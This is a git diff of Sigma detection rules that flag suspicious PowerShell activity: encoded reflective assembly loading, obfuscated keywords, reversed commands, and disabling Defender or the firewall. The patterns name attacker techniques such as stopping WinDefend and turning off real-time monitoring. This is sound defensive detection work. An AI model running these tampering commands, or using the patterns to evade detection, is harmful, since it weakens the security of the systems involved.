b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml @@ -1,8 +1,8 @@ title: PowerShell Base64 Encoded Reflective Assembly Load id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 related: - - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 - type: similar + - id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 + type: similar status: test description: Detects base64 encoded .NET reflective loading of Assembly references: @@ -26,16 +26,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # [Reflection.Assembly]::Load( - WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA - sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA - bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA + # [reflection.assembly]::("Load") - AFsAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiAC - BbAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgAp - AWwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAK + # [Reflection.Assembly]::("Load") - WwBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6ACgAIgBMAG8AYQBkACIAKQ - sAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgAoACIATABvAGEAZAAiACkA - bAFIAZQBmAGwAZQBjAHQAaQBvAG4ALgBBAHMAcwBlAG0AYgBsAHkAXQA6ADoAKAAiAEwAbwBhAGQAIgApA + # [reflection.assembly]::Load( - WwByAGUAZgBsAGUAYwB0AGkAbwBuAC4AYQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKA - sAcgBlAGYAbABlAGMAdABpAG8AbgAuAGEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgA - bAHIAZQBmAGwAZQBjAHQAaQBvAG4ALgBhAHMAcwBlAG0AYgBsAHkAXQA6ADoATABvAGEAZAAoA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml index b3088b953..a4e93da83 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml @@ -1,11 +1,10 @@ title: Suspicious Encoded And Obfuscated Reflection Assembly Load Function Call id: 9c0295ce-d60d-40bd-bd74-84673b7592b1 related: - - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 - type: similar + - id: 62b7ccc9-23b4-471e-aa15-6da3663c4d59 + type: similar status: test -description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used - in .NET "reflection.assembly" +description: Detects suspicious base64 encoded and obfuscated "LOAD" keyword used in .NET "reflection.assembly" references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar - https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/ @@ -27,22 +26,28 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + CommandLine|contains: + # ::("L"+"oad") - OgA6ACgAIgBMACIAKwAiAG8AYQBkACIAKQ - oAOgAoACIATAAiACsAIgBvAGEAZAAiACkA - 6ADoAKAAiAEwAIgArACIAbwBhAGQAIgApA + # ::("Lo"+"ad") - OgA6ACgAIgBMAG8AIgArACIAYQBkACIAKQ - oAOgAoACIATABvACIAKwAiAGEAZAAiACkA - 6ADoAKAAiAEwAbwAiACsAIgBhAGQAIgApA + # ::("Loa"+"d") - OgA6ACgAIgBMAG8AYQAiACsAIgBkACIAKQ - oAOgAoACIATABvAGEAIgArACIAZAAiACkA - 6ADoAKAAiAEwAbwBhACIAKwAiAGQAIgApA + # ::('L'+'oad') - OgA6ACgAJwBMACcAKwAnAG8AYQBkACcAKQ - oAOgAoACcATAAnACsAJwBvAGEAZAAnACkA - 6ADoAKAAnAEwAJwArACcAbwBhAGQAJwApA + # ::('Lo'+'ad') - OgA6ACgAJwBMAG8AJwArACcAYQBkACcAKQ - oAOgAoACcATABvACcAKwAnAGEAZAAnACkA - 6ADoAKAAnAEwAbwAnACsAJwBhAGQAJwApA + # ::('Loa'+'d') - OgA6ACgAJwBMAG8AYQAnACsAJwBkACcAKQ - oAOgAoACcATABvAGEAJwArACcAZAAnACkA - 6ADoAKAAnAEwAbwBhACcAKwAnAGQAJwApA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml index 6b33db304..ff5c5fc6b 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml @@ -1,11 +1,10 @@ title: PowerShell Base64 Encoded WMI Classes id: 1816994b-42e1-4fb1-afd2-134d88184f71 related: - - id: 47688f1b-9f51-4656-b013-3cc49a166a36 - type: obsoletes + - id: 47688f1b-9f51-4656-b013-3cc49a166a36 + type: obsoletes status: test -description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", - "Win32_ScheduledJob", etc. +description: Detects calls to base64 encoded WMI class such as "Win32_Shadowcopy", "Win32_ScheduledJob", etc. references: - https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar author: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -24,14 +23,15 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli_shadowcopy: - CommandLine|contains: + # Win32_Shadowcopy + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBoAGEAZABvAHcAYwBvAHAAeQ - cAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkA - XAGkAbgAzADIAXwBTAGgAYQBkAG8AdwBjAG8AcAB5A @@ -39,7 +39,8 @@ detection: - dpbjMyX1NoYWRvd2NvcH - XaW4zMl9TaGFkb3djb3B5 selection_cli_scheduledJob: - CommandLine|contains: + # Win32_ScheduledJob + CommandLine|contains: - VwBpAG4AMwAyAF8AUwBjAGgAZQBkAHUAbABlAGQASgBvAGIA - cAaQBuADMAMgBfAFMAYwBoAGUAZAB1AGwAZQBkAEoAbwBiA - XAGkAbgAzADIAXwBTAGMAaABlAGQAdQBsAGUAZABKAG8AYg @@ -47,7 +48,8 @@ detection: - dpbjMyX1NjaGVkdWxlZEpvY - XaW4zMl9TY2hlZHVsZWRKb2 selection_cli_process: - CommandLine|contains: + # Win32_Process + CommandLine|contains: - VwBpAG4AMwAyAF8AUAByAG8AYwBlAHMAcw - cAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMA - XAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzA @@ -55,7 +57,8 @@ detection: - dpbjMyX1Byb2Nlc3 - XaW4zMl9Qcm9jZXNz selection_cli_useraccount: - CommandLine|contains: + # Win32_UserAccount + CommandLine|contains: - VwBpAG4AMwAyAF8AVQBzAGUAcgBBAGMAYwBvAHUAbgB0A - cAaQBuADMAMgBfAFUAcwBlAHIAQQBjAGMAbwB1AG4AdA - XAGkAbgAzADIAXwBVAHMAZQByAEEAYwBjAG8AdQBuAHQA @@ -63,7 +66,8 @@ detection: - dpbjMyX1VzZXJBY2NvdW50 - XaW4zMl9Vc2VyQWNjb3Vud selection_cli_loggedonuser: - CommandLine|contains: + # Win32_LoggedOnUser + CommandLine|contains: - VwBpAG4AMwAyAF8ATABvAGcAZwBlAGQATwBuAFUAcwBlAHIA - cAaQBuADMAMgBfAEwAbwBnAGcAZQBkAE8AbgBVAHMAZQByA - XAGkAbgAzADIAXwBMAG8AZwBnAGUAZABPAG4AVQBzAGUAcg diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml index 0f2f586d3..8c4413ce4 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_invocation.yml @@ -1,8 +1,7 @@ title: Potential Process Execution Proxy Via CL_Invocation.ps1 id: a0459f02-ac51-4c09-b511-b8c9203fc429 status: test -description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" - script to proxy execution using "System.Diagnostics.Process" +description: Detects calls to "SyncInvoke" that is part of the "CL_Invocation.ps1" script to proxy execution using "System.Diagnostics.Process" references: - https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/ - https://twitter.com/bohops/status/948061991012327424 @@ -21,7 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: 'SyncInvoke ' + # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example. + CommandLine|contains: 'SyncInvoke ' condition: process_creation and selection falsepositives: - Unknown diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml index 99a8ebf3a..01ba04526 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_loadassembly.yml @@ -1,9 +1,7 @@ title: Assembly Loading Via CL_LoadAssembly.ps1 id: c57872c7-614f-4d7f-a40d-b78c8df2d30d status: experimental -description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that - are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different - assemblies and bypass App locker controls. +description: Detects calls to "LoadAssemblyFromPath" or "LoadAssemblyFromNS" that are part of the "CL_LoadAssembly.ps1" script. This can be abused to load different assemblies and bypass App locker controls. references: - https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/ - https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/ @@ -22,7 +20,8 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains: + # Note: As this function is usually called from within powershell, classical process creation even would not catch it. This will only catch inline calls via "-Command" or "-ScriptBlock" flags for example. + CommandLine|contains: - 'LoadAssemblyFromPath ' - 'LoadAssemblyFromNS ' condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml index d0f115e24..eda486dcd 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml @@ -1,12 +1,10 @@ title: Potential Script Proxy Execution Via CL_Mutexverifiers.ps1 id: 1e0e1a81-e79b-44bc-935b-ddb9c8006b3d status: experimental -description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to - proxy the execution of additional PowerShell script commands +description: Detects the use of the Microsoft signed script "CL_mutexverifiers" to proxy the execution of additional PowerShell script commands references: - https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/ -author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, - frack113 +author: Nasreddine Bencherchali (Nextron Systems), oscd.community, Natalia Shornikova, frack113 date: 2022/05/21 modified: 2023/08/17 tags: @@ -22,12 +20,14 @@ detection: Channel: Microsoft-Windows-Sysmon/Operational selection_pwsh: ParentImage|endswith: + # Note: to avoid potential FPs we assume the script was launched from powershell. But in theory it can be launched by any Powershell like process - \powershell.exe - \pwsh.exe Image|endswith: \powershell.exe - CommandLine|contains: ' -nologo -windowstyle minimized -file ' + CommandLine|contains: ' -nologo -windowstyle minimized -file ' selection_temp: - CommandLine|contains: + # Note: Since the function uses "env:temp" the value will change depending on the context of exec + CommandLine|contains: - \AppData\Local\Temp\ - \Windows\Temp\ condition: process_creation and (all of selection_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml index fb4e0f0f0..67e784b01 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml @@ -1,8 +1,7 @@ title: ConvertTo-SecureString Cmdlet Usage Via CommandLine id: 74403157-20f5-415d-89a7-c505779585cf status: test -description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. - Which is fairly uncommon and could indicate potential suspicious activity +description: Detects usage of the "ConvertTo-SecureString" cmdlet via the commandline. Which is fairly uncommon and could indicate potential suspicious activity references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=65 - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.security/convertto-securestring?view=powershell-7.3#examples @@ -23,14 +22,14 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: ConvertTo-SecureString + CommandLine|contains: ConvertTo-SecureString condition: process_creation and (all of selection_*) falsepositives: - Legitimate use to pass password to different powershell commands diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml index ca68aabe0..5c5eae4c2 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml @@ -1,8 +1,7 @@ title: Potential PowerShell Obfuscation Via Reversed Commands id: b6b49cd1-34d6-4ead-b1bf-176e9edba9a4 status: test -description: Detects the presence of reversed PowerShell commands in the CommandLine. - This is often used as a method of obfuscation by attackers +description: Detects the presence of reversed PowerShell commands in the CommandLine. This is often used as a method of obfuscation by attackers references: - https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/ - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66 @@ -23,18 +22,18 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains: + CommandLine|contains: - hctac - kaerb - dnammoc - - ekovn + - ekovn # Also covers 'ekovni' - eliFd - rahc - etirw @@ -57,7 +56,10 @@ detection: - hcaerof - retupmoc filter_main_encoded_keyword: - CommandLine|contains: + # We exclude usage of encoded commands as they might generate FPs as shown here: + # https://github.com/SigmaHQ/sigma/pull/2720 + # https://github.com/SigmaHQ/sigma/issues/4270 + CommandLine|contains: - ' -EncodedCommand ' - ' -enc ' condition: process_creation and (all of selection_* and not 1 of filter_main_*) diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml index f96939a3f..af1194f19 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml @@ -4,8 +4,7 @@ status: test description: Detects the PowerShell command lines with special characters references: - https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=64 -author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton - (fp) +author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp) date: 2020/10/15 modified: 2023/04/06 tags: @@ -22,24 +21,24 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_re: - - CommandLine|re: .*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.* - - CommandLine|re: .*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.* - - CommandLine|re: .*\^.*\^.*\^.*\^.*\^.* - - CommandLine|re: .*`.*`.*`.*`.*`.* + # TODO: Optimize for PySIGMA + - CommandLine|re: .*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.*\+.* + - CommandLine|re: .*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.*\{.* + - CommandLine|re: .*\^.*\^.*\^.*\^.*\^.* + - CommandLine|re: .*`.*`.*`.*`.*`.* filter_optional_amazonSSM: ParentImage: C:\Program Files\Amazon\SSM\ssm-document-worker.exe filter_optional_defender_atp: - CommandLine|contains: + CommandLine|contains: - new EventSource("Microsoft.Windows.Sense.Client.Management" - - public static extern bool InstallELAMCertificateInfo(SafeFileHandle - handle); + - public static extern bool InstallELAMCertificateInfo(SafeFileHandle handle); condition: process_creation and (all of selection_* and not 1 of filter_optional_*) falsepositives: - Amazon SSM Document Worker diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml index fdae3eaaf..18cc01d8a 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml @@ -1,11 +1,10 @@ title: Computer Discovery And Export Via Get-ADComputer Cmdlet id: 435e10e4-992a-4281-96f3-38b11106adde related: - - id: db885529-903f-4c5d-9864-28fe199e6370 - type: similar + - id: db885529-903f-4c5d-9864-28fe199e6370 + type: similar status: test -description: Detects usage of the Get-ADComputer cmdlet to collect computer information - and output it to a file +description: Detects usage of the Get-ADComputer cmdlet to collect computer information and output it to a file references: - http://blog.talosintelligence.com/2022/09/lazarus-three-rats.html - https://www.microsoft.com/en-us/security/blog/2022/10/18/defenders-beware-a-case-for-post-ransomware-investigations/ @@ -25,17 +24,17 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_img: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - 'Get-ADComputer ' - ' -Filter \*' - CommandLine|contains: + CommandLine|contains: - ' > ' - ' | Select ' - Out-File @@ -43,7 +42,6 @@ detection: - Add-Content condition: process_creation and (all of selection_*) falsepositives: - - Legitimate admin scripts may use the same technique, it's better to exclude - specific computers or users who execute these commands or scripts often + - Legitimate admin scripts may use the same technique, it's better to exclude specific computers or users who execute these commands or scripts often level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_create_service.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_create_service.yml index 4b13fe1d9..638d50895 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_create_service.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_create_service.yml @@ -1,8 +1,8 @@ title: New Service Creation Using PowerShell id: c02e96b7-c63a-4c47-bd83-4a9f74afcfb2 related: - - id: 85ff530b-261d-48c6-a441-facaa2e81e48 - type: similar + - id: 85ff530b-261d-48c6-a441-facaa2e81e48 # Using Sc.EXE + type: similar status: test description: Detects the creation of a new service using powershell. references: @@ -22,7 +22,7 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - New-Service - -BinaryPathName condition: process_creation and selection diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml index 553df5e59..f87688140 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_decode_gzip.yml @@ -18,13 +18,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection: - CommandLine|contains|all: + CommandLine|contains|all: - GZipStream - ::Decompress condition: process_creation and selection falsepositives: - - Legitimate administrative scripts may use this functionality. Use "ParentImage" - in combination with the script names and allowed users and applications to - filter legitimate executions + - Legitimate administrative scripts may use this functionality. Use "ParentImage" in combination with the script names and allowed users and applications to filter legitimate executions level: medium ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml index e31a53d4d..3c38dc523 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_decrypt_pattern.yml @@ -1,8 +1,7 @@ title: PowerShell Execution With Potential Decryption Capabilities id: 434c08ba-8406-4d15-8b24-782cb071a691 status: experimental -description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the - next stage of the malware. +description: Detects PowerShell commands that decrypt an ".LNK" "file to drop the next stage of the malware. references: - https://research.checkpoint.com/2023/chinese-threat-actors-targeting-europe-in-smugx-campaign/ author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) @@ -26,29 +25,29 @@ detection: - PowerShell.EXE - pwsh.dll selection_cli_dir: - CommandLine|contains: + CommandLine|contains: - 'Get-ChildItem ' - 'dir ' - 'gci ' - 'ls ' selection_cli_gc: - CommandLine|contains: + CommandLine|contains: - 'Get-Content ' - 'gc ' - 'cat ' - 'type ' - ReadAllBytes selection_cli_specific: - - CommandLine|contains|all: - - ' ^| ' - - \*.lnk - - -Recurse - - '-Skip ' - - CommandLine|contains|all: - - ' -ExpandProperty ' - - \*.lnk - - WriteAllBytes - - ' .length ' + - CommandLine|contains|all: + - ' ^| ' + - \*.lnk + - -Recurse + - '-Skip ' + - CommandLine|contains|all: + - ' -ExpandProperty ' + - \*.lnk + - WriteAllBytes + - ' .length ' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml index 8feb6ddf2..89289fc57 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_disable_feature.yml @@ -1,8 +1,7 @@ title: Powershell Defender Disable Scan Feature id: 1ec65a5f-9473-4f12-97da-622044d6df21 status: test -description: Detects requests to disable Microsoft Defender features using PowerShell - commands +description: Detects requests to disable Microsoft Defender features using PowerShell commands references: - https://docs.microsoft.com/en-us/powershell/module/defender/set-mppreference?view=windowsserver2022-ps - https://www.virustotal.com/gui/file/d609799091731d83d75ec5d1f030571af20c45efeeb94840b67ea09a3283ab65/behavior/C2AE @@ -22,11 +21,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_cli_cmdlet: - CommandLine|contains: + CommandLine|contains: - 'Add-MpPreference ' - 'Set-MpPreference ' selection_cli_option: - CommandLine|contains: + CommandLine|contains: - 'DisableArchiveScanning ' - 'DisableRealtimeMonitoring ' - 'DisableIOAVProtection ' @@ -35,11 +34,12 @@ detection: - 'DisableCatchupFullScan ' - 'DisableCatchupQuickScan ' selection_cli_value: - CommandLine|contains: + CommandLine|contains: - $true - ' 1 ' selection_encoded_modifier: - CommandLine|base64offset|contains: + CommandLine|base64offset|contains: + # Note: Since this is calculating offsets casing is important - 'disablearchivescanning ' - 'DisableArchiveScanning ' - 'disablebehaviormonitoring ' @@ -55,7 +55,7 @@ detection: - 'disablerealtimemonitoring ' - 'DisableRealtimeMonitoring ' selection_encoded_direct: - CommandLine|contains: + CommandLine|contains: - RABpAHMAYQBiAGwAZQBSAGUAYQBsAHQAaQBtAGUATQBvAG4AaQB0AG8AcgBpAG4AZwAgA - QAaQBzAGEAYgBsAGUAUgBlAGEAbAB0AGkAbQBlAE0AbwBuAGkAdABvAHIAaQBuAGcAIA - EAGkAcwBhAGIAbABlAFIAZQBhAGwAdABpAG0AZQBNAG8AbgBpAHQAbwByAGkAbgBnACAA diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml index ddd9631eb..1a2137613 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_defender_exclusion.yml @@ -1,11 +1,10 @@ title: Powershell Defender Exclusion id: 17769c90-230e-488b-a463-e05c08e9d48f related: - - id: c1344fa2-323b-4d2e-9176-84b4d4821c88 - type: similar + - id: c1344fa2-323b-4d2e-9176-84b4d4821c88 + type: similar status: test -description: Detects requests to exclude files, folders or processes from Antivirus - scanning using PowerShell cmdlets +description: Detects requests to exclude files, folders or processes from Antivirus scanning using PowerShell cmdlets references: - https://docs.microsoft.com/en-us/microsoft-365/security/defender-endpoint/configure-process-opened-file-exclusions-microsoft-defender-antivirus - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md @@ -25,11 +24,11 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection1: - CommandLine|contains: + CommandLine|contains: - 'Add-MpPreference ' - 'Set-MpPreference ' selection2: - CommandLine|contains: + CommandLine|contains: - ' -ExclusionPath ' - ' -ExclusionExtension ' - ' -ExclusionProcess ' diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml index 7ed0bcd55..a87f60f17 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml @@ -21,37 +21,34 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_pwsh_binary: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - OriginalFileName: - - PowerShell.EXE - - pwsh.dll + - Image|endswith: + - \powershell.exe + - \pwsh.exe + - OriginalFileName: + - PowerShell.EXE + - pwsh.dll selection_pwsh_cli: - CommandLine|contains: + CommandLine|contains: - -DisableBehaviorMonitoring $true - -DisableRuntimeMonitoring $true selection_sc_binary: - - Image|endswith: \sc.exe - - OriginalFileName: sc.exe + - Image|endswith: \sc.exe + - OriginalFileName: sc.exe selection_sc_tamper_cmd_stop: - CommandLine|contains|all: + CommandLine|contains|all: - stop - WinDefend selection_sc_tamper_cmd_delete: - CommandLine|contains|all: + CommandLine|contains|all: - delete - WinDefend selection_sc_tamper_cmd_disabled: - CommandLine|contains|all: + CommandLine|contains|all: - config - WinDefend - start=disabled - condition: process_creation and (all of selection_pwsh_* or (selection_sc_binary - and 1 of selection_sc_tamper_*)) + condition: process_creation and (all of selection_pwsh_* or (selection_sc_binary and 1 of selection_sc_tamper_*)) falsepositives: - - Minimal, for some older versions of dev tools, such as pycharm, developers were - known to sometimes disable Windows Defender to improve performance, but this - generally is not considered a good security practice. + - Minimal, for some older versions of dev tools, such as pycharm, developers were known to sometimes disable Windows Defender to improve performance, but this generally is not considered a good security practice. level: high ruletype: Sigma diff --git a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml index 2c56c2fcc..2f5bba507 100644 --- a/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml +++ b/sigma/sysmon/process_creation/proc_creation_win_powershell_disable_firewall.yml @@ -1,8 +1,8 @@ title: Windows Firewall Disabled via PowerShell id: 12f6b752-042d-483e-bf9c-915a6d06ad75 related: - - id: 488b44e7-3781-4a71-888d-c95abfacf44d - type: similar + - id: 488b44e7-3781-4a71-888d-c95abfacf44d + type: similar status: test description: Detects attempts to disable the Windows Firewall using PowerShell references: @@ -22,20 +22,20 @@ detection: EventID: 1 Channel: Microsoft-Windows-Sysmon/Operational selection_name: - - Image|endswith: - - \powershell.exe - - \pwsh.exe - - \powershell_ise.exe - - OriginalFileName: - - PowerShell.EXE - - 